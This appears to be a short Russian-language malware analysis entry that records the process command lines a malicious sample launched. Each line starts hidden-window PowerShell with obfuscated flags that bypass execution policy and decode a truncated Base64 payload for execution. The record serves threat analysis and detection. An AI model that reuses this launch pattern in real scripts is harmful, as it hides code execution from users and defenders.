Техническая информация
- '<SYSTEM32>\cmd.exe' /C Powershell.exe -noexit -execUtionPoLiCy ByPAsS -winDoWStYle hidDen -command $nhqId = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JHJhbGYgPSAgIlVuIisiQGMiKyLCo2QiKyJlIiAtam9...
- '<SYSTEM32>\cmd.exe' /C Powershell.exe -noexit -execUtionPoLiCy ByPAsS -winDoWStYle hidDen -command $nhqId = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JHJhbGYgPSAgIlVuIisiQGMiKyLCo2QiKyJlIiAtam9...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -execUtionPoLiCy ByPAsS -winDoWStYle hidDen -command $nhqId = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JHJhbGYgPSAgIlVuIisiQGMiKyLCo2QiKyJlIiAtam9pbiAnJzskbWFudGVjY...